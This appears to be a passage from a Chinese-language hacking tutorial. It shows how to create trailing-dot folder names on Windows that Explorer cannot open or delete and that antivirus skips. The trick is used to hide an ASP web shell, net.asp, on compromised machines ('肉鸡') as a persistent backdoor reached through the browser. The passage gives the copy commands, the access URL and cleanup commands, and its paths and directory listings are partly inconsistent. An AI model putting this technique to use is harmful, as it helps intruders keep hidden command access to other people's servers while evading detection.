----------------------------------------------
为什么会这样?我们先说您看到的这个“S.”文档夹,他即不能打开也不能删除,不能打开是因为他的实际路径是“c:/winnt/system32/myhome/s../”(我们自己创建的所以能够确定他的实际路径)但是在Windows资源管理器中名字变成了“S.”也就是说当您试图打开他的时候Windows实际上尝试打开“c:/winnt/system32/myhome/s./”当然是不能打开的,文档并不存在,所以Windows会报错。不能删除也是因为这个,Windows把一个实际存在的文档路径错误的解析为一个不存在的路径,并进行xx作当然是无法完成的。
该说“S..”这个文档了,这个文档能够打开,但是却无法删除。等等……打开?您以为Windows真的是打开了我们创建的“s.../”文档了吗?我们做下面的试验您就明白了。还是老规矩{}是我的注释方便大家理解:
----------------------------------------------
Microsoft Windows XP [版本 5.1.2600]
(C) 版权任何 1985-2001 Microsoft Corp.
c:/winnt/system32/myhome>copy net.asp s../ {复制刚刚您的asp的木马文档到“s../”,资源管理器的“S.”}
已复制 1 个文档。
c:/winnt/system32/myhome>
----------------------------------------------
现在回到您的资源管理器打开“S.”文档夹,您看到了什么?“net.asp”文档怎么会在这里?我们刚刚的确复制到了“S.”呀?难道我们打开“S.”文档夹实际上就是打开了“S”?不错事实就是这样。其实假如您再创建一个“S”文档夹的话“S.”就能打开了,但是实际上打开的是“S”。
这是关键的话题了,其实我们就利用S.目录不被杀的目的来隐藏我们的木马,不管木马都毒,可是一般来说的exe文档不能在s.这样的目录下运行的,但是asp木马却能够!能够通过浏览来执行CMD命令,把net.asp复制到s.目录后,把net.asp删了,我们在浏览器中http://127.0.0.1/kiss/kiss/s../net.asp 就能够看到浏览得asp木马了到了,一般用户根本不可能发现他,就算专业级的杀毒软件也只会去杀“s”而跳过“s../”,好了那就说一下删除方法吧
Microsoft Windows XP [版本 5.1.2600]
(C) 版权任何 1985-2001 Microsoft Corp.
F:/Test>dir
驱动器 F 中的卷是 BGTING
卷的序列号是 2C8E-FE1C
F:/Test 的目录
2003-09-11 17:50 <DIR> .
2003-09-11 17:50 <DIR> ..
2003-09-11 18:35 <DIR> s.
2003-09-11 18:37 <DIR> s..
1 个文档 9 字节
5 个目录 3,390,029,824 可用字节
c:/winnt/system32/myhome>rmdir s../
目录不是空的。
c:/winnt/system32/myhome>rmdir s../ /s
s../, 是否确认(Y/N)? y
c:/winnt/system32/myhome>rmdir s.../ /s
s.../, 是否确认(Y/N)? y
这也不用担心搞坏您肉鸡了,好了这样一个很隐蔽的后门就建立了,而且不被杀,假如在肉鸡,上述要在3389进行测试通过的。
